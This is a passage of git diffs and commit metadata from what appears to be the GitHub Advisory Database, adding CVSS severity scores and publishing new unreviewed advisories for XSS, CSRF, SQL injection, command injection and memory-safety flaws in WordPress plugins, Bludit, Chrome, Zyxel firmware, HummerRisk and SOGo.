null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json index f4067b6fd2983..f54adcc8f9bc8 100644 --- a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json +++ b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rw5q-r997-qm48", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69389" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Visitor Maps Extended Referer Field visitor-maps-extended-referer-field allows Reflected XSS.This issue affects Visitor Maps Extended Referer Field: from n/a through <= 1.2.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json index 728988ddf6b00..15bbe99305c24 100644 --- a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json +++ b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v534-r4rj-rcvf", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68845" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Translations eDS Responsive Menu eds-responsive-menu allows Reflected XSS.This issue affects eDS Responsive Menu: from n/a through <= 1.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json index e3a4eb2776bd6..7efb26e12481a 100644 --- a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json +++ b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vjvc-9fxm-2xw8", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69368" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes SOHO - Photography WordPress Theme soho allows DOM-Based XSS.This issue affects SOHO - Photography WordPress Theme: from n/a through <= 3.0.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:21Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json b/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json new file mode 100644 index 0000000000000..60519900350be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmmw-c3hw-gvm3", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3062" + ], + "details": "Out of bounds read and write in Tint in Google Chrome on Mac prior to 145.0.7632.116 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3062" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/483751167" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json index bf5b830a16403..11d880dc390d2 100644 --- a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json +++ b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vph5-6p6f-8xpf", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-68031" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in faraz sms افزونه پیامک حرفه ای فراز اس ام اس farazsms allows Reflected XSS.This issue affects افزونه پیامک حرفه ای فراز اس ام اس: from n/a through <= 2.7.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json index a2c559792d9ce..8079f95fec16d 100644 --- a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json +++ b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w7wv-fvvq-ppfp", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68852" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webmuehle Court Reservation court-reservation allows Reflected XSS.This issue affects Court Reservation: from n/a through <= 1.10.9.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json index b108256ae4364..6687d3537ab09 100644 --- a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json +++ b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wf36-8q2p-m2xg", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53231" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevstudio Easy Taxonomy Images easy-taxonomy-images allows Stored XSS.This issue affects Easy Taxonomy Images: from n/a through <= 1.0.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:01Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json b/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json new file mode 100644 index 0000000000000..c8606d368384d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wg93-hp69-vv5w", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-27742" + ], + "details": "Bludit version 3.16.2 contains a stored cross-site scripting (XSS) vulnerability in the post content functionality. The application performs client-side sanitation of content input but does not enforce equivalent sanitation on the server side. An authenticated user can inject arbitrary JavaScript into the content field of a post, which is stored and later rendered to other users without proper output encoding. When viewed, the injected script executes in the context of the victim’s browser, allowing session hijacking, credential theft, content manipulation, or other actions within the user’s privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27742" + }, + { + "type": "WEB", + "url": "https://github.com/bludit/bludit/issues/1579" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bludit-stored-xss-in-post-content" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json index 63ac5f6018190..1a79678c1149c 100644 --- a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json +++ b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x6m2-4qvv-ghf6", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69367" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Oyster - Photography WordPress Theme oyster allows DOM-Based XSS.This issue affects Oyster - Photography WordPress Theme: from n/a through <= 4.4.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json index e723a1688579b..ac16b42635239 100644 --- a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json +++ b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xg7c-7v8p-8ww8", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-69302" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core Features designthemes-core-features allows Reflected XSS.This issue affects DesignThemes Core Features: from n/a through <= 2.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json b/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json new file mode 100644 index 0000000000000..d1f57ae140ab9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw6c-ffpm-fgcm", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-27741" + ], + "details": "Bludit version 3.16.1 contains a cross-site request forgery (CSRF) vulnerability in the /admin/uninstall-plugin/ and /admin/install-theme/ endpoints. The application does not implement anti-CSRF tokens or other request origin validation mechanisms for these administrative actions. An attacker can induce an authenticated administrator to visit a malicious page that silently submits crafted requests, resulting in unauthorized plugin uninstallation or theme installation. This may lead to loss of functionality, execution of untrusted code via malicious themes, and compromise of system integrity.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27741" + }, + { + "type": "WEB", + "url": "https://github.com/bludit/bludit/issues/1577" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bludit-csrf-in-plugin-and-theme-management-endpoints" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file From bb981588c8b36ca53f26b77c76bee14f49e24e7d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 03:31:35 +0000 Subject: [PATCH 73/77] Publish Advisories GHSA-2fmw-p7gw-97jj GHSA-38jp-gj76-pm7x GHSA-47ph-5j6m-fmgx GHSA-57jm-2xq8-jwj3 GHSA-7w2h-4285-9pwr GHSA-934v-v4wh-rf2c GHSA-cqj6-j4f4-mcpp GHSA-f256-j3x2-h7wh GHSA-fj46-cfm8-7pc4 GHSA-m8fj-fqgq-fj22 GHSA-mg73-f2jm-wph7 GHSA-qhmq-843h-9vq8 GHSA-r8mv-7fwh-cfvr GHSA-v2vh-hr2h-f29r GHSA-vq86-4hgw-x482 GHSA-vv96-h3xf-q33j GHSA-w3pf-j6xr-fj68 GHSA-x6c4-87pg-m84f GHSA-xqg5-5x64-93r9 --- .../GHSA-2fmw-p7gw-97jj.json | 36 +++++++++++ .../GHSA-38jp-gj76-pm7x.json | 52 ++++++++++++++++ .../GHSA-47ph-5j6m-fmgx.json | 48 +++++++++++++++ .../GHSA-57jm-2xq8-jwj3.json | 56 +++++++++++++++++ .../GHSA-7w2h-4285-9pwr.json | 36 +++++++++++ .../GHSA-934v-v4wh-rf2c.json | 36 +++++++++++ .../GHSA-cqj6-j4f4-mcpp.json | 60 +++++++++++++++++++ .../GHSA-f256-j3x2-h7wh.json | 56 +++++++++++++++++ .../GHSA-fj46-cfm8-7pc4.json | 36 +++++++++++ .../GHSA-m8fj-fqgq-fj22.json | 36 +++++++++++ .../GHSA-mg73-f2jm-wph7.json | 36 +++++++++++ .../GHSA-qhmq-843h-9vq8.json | 36 +++++++++++ .../GHSA-r8mv-7fwh-cfvr.json | 36 +++++++++++ .../GHSA-v2vh-hr2h-f29r.json | 56 +++++++++++++++++ .../GHSA-vq86-4hgw-x482.json | 52 ++++++++++++++++ .../GHSA-vv96-h3xf-q33j.json | 60 +++++++++++++++++++ .../GHSA-w3pf-j6xr-fj68.json | 56 +++++++++++++++++ .../GHSA-x6c4-87pg-m84f.json | 36 +++++++++++ .../GHSA-xqg5-5x64-93r9.json | 56 +++++++++++++++++ 19 files changed, 876 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-934v-v4wh-rf2c/GHSA-934v-v4wh-rf2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cqj6-j4f4-mcpp/GHSA-cqj6-j4f4-mcpp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f256-j3x2-h7wh/GHSA-f256-j3x2-h7wh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fj46-cfm8-7pc4/GHSA-fj46-cfm8-7pc4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8fj-fqgq-fj22/GHSA-m8fj-fqgq-fj22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mg73-f2jm-wph7/GHSA-mg73-f2jm-wph7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qhmq-843h-9vq8/GHSA-qhmq-843h-9vq8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r8mv-7fwh-cfvr/GHSA-r8mv-7fwh-cfvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json diff --git a/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json b/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json new file mode 100644 index 0000000000000..78898122ca9b6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2fmw-p7gw-97jj/GHSA-2fmw-p7gw-97jj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2fmw-p7gw-97jj", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2025-11845" + ], + "details": "A null pointer dereference vulnerability in the certificate downloader CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.6)C0 and the Zyxel WX3100-T0 firmware versions through 5.50(ABVL.4.8)C0 could allow an authenticated attacker with administrator privileges to trigger a denial-of-service (DoS) condition by sending a crafted HTTP request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11845" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T02:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json b/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json new file mode 100644 index 0000000000000..1f0f8e77f3086 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38jp-gj76-pm7x/GHSA-38jp-gj76-pm7x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38jp-gj76-pm7x", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3064" + ], + "details": "A security vulnerability has been detected in HummerRisk up to 1.5.0. Affected by this issue is some unknown functionality of the file ResourceCreateService.java of the component Cloud Task Scheduler. Such manipulation of the argument regionId leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3064" + }, + { + "type": "WEB", + "url": "https://github.com/AnalogyC0de/public_exp/issues/8" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347415" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347415" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757695" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json b/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json new file mode 100644 index 0000000000000..ae9be4f181320 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47ph-5j6m-fmgx/GHSA-47ph-5j6m-fmgx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47ph-5j6m-fmgx", + "modified": "2026-02-24T03:30:20Z", + "published": "2026-02-24T03:30:20Z", + "aliases": [ + "CVE-2026-3054" + ], + "details": "A vulnerability was identified in Alinto SOGo 5.12.3/5.12.4. This impacts an unknown function. The manipulation of the argument hint leads to cross site scripting. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3054" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347412" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347412" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757609" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T03:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json b/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json new file mode 100644 index 0000000000000..a9247e68c45e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-57jm-2xq8-jwj3/GHSA-57jm-2xq8-jwj3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57jm-2xq8-jwj3", + "modified": "2026-02-24T03:30:19Z", + "published": "2026-02-24T03:30:19Z", + "aliases": [ + "CVE-2026-3046" + ], + "details": "A security vulnerability has been detected in itsourcecode E-Logbook with Health Monitoring System for COVID-19 1.0. This vulnerability affects unknown code of the file /check_profile_old.php. The manipulation of the argument profile_id leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3046" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/cve_submit/issues/3" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757247" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T01:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json b/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json new file mode 100644 index 0000000000000..37bef67de82db --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7w2h-4285-9pwr/GHSA-7w2h-4285-9pwr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w2h-4285-9pwr", + "modified": "2026-02-24T03:30:19Z", + "published": 